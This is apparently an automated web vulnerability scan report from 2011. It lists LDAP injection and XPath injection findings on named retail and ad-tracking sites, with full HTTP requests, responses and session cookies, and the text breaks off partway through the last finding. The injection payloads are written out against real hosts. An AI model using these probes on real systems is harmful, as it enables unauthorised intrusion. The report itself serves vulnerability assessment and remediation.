<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara&#153; Interior Design Window Film - Rice Paper
...[SNIP]...

2. LDAP injection  previous  next
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://action.media6degrees.com/orbserv/hbjs [pixId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The pixId parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the pixId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbjs?pixId=*)(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f3000a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000pj0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z5k0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: JSESSIONID=BFCF45F58B9C4575A09FBB0A8F2FCF28; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5
Date: Mon, 16 May 2011 01:56:09 GMT






Request 2

GET /orbserv/hbjs?pixId=*)!(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f3100a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000pk0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z5l0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5
Date: Mon, 16 May 2011 01:56:10 GMT







2.2. http://cimg-1.restorationhardware.com/cm [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cimg-1.restorationhardware.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 84d15caee2971e21)(sn=* and 84d15caee2971e21)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?tid=6&ci=84d15caee2971e21)(sn=*&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 84d15caee2971e21)(sn=*_login=1305510803016783924284d15caee2971e21)(sn=*; path=/
Set-Cookie: 84d15caee2971e21)(sn=*_reset=1305510803;path=/
Expires: Sun, 15 May 2011 07:53:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?tid=6&ci=84d15caee2971e21)!(sn=*&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 84d15caee2971e21)!(sn=*_login=1305510803015106202684d15caee2971e21)!(sn=*; path=/
Set-Cookie: 84d15caee2971e21)!(sn=*_reset=1305510803;path=/
Expires: Sun, 15 May 2011 07:53:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.3. http://server.bhphotovideo.com/cm [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://server.bhphotovideo.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 4f30a508a84f4dfe)(sn=* and 4f30a508a84f4dfe)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=4f30a508a84f4dfe)(sn=*&st=1305509945626&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305510778300&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305509951

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 4f30a508a84f4dfe)(sn=*_login=130551078001678392424f30a508a84f4dfe)(sn=*; path=/
Set-Cookie: 4f30a508a84f4dfe)(sn=*_reset=1305510780;path=/
Expires: Sun, 15 May 2011 07:53:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=4f30a508a84f4dfe)!(sn=*&st=1305509945626&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305510778300&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305509951

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 4f30a508a84f4dfe)!(sn=*_login=130551078001007303784f30a508a84f4dfe)!(sn=*; path=/
Set-Cookie: 4f30a508a84f4dfe)!(sn=*_reset=1305510780;path=/
Expires: Sun, 15 May 2011 07:53:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

3. XPath injection  previous  next
There are 8 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


3.1. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Cat_Discussion_Forum/fd03p00v02d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Cat_Discussion_Forum/fd03p00v02d1?widgetId=PTWidget3&cdsn=476&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.2. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Dog_Discussion_Forum/fd03p00v01d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Dog_Discussion_Forum/fd03p00v01d1?widgetId=PTWidget2&cdsn=568&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.3. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Fish_Discussion_Forum/fd03p00v03d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget4&cdsn=873&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.4. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Reptile_Discussion_Forum/fd03p00v05d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Reptile_Discussion_Forum/fd03p00v05d1?widgetId=PTWidget7&cdsn=892&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.5. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1?widgetId=PTWidget5&cdsn=224&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
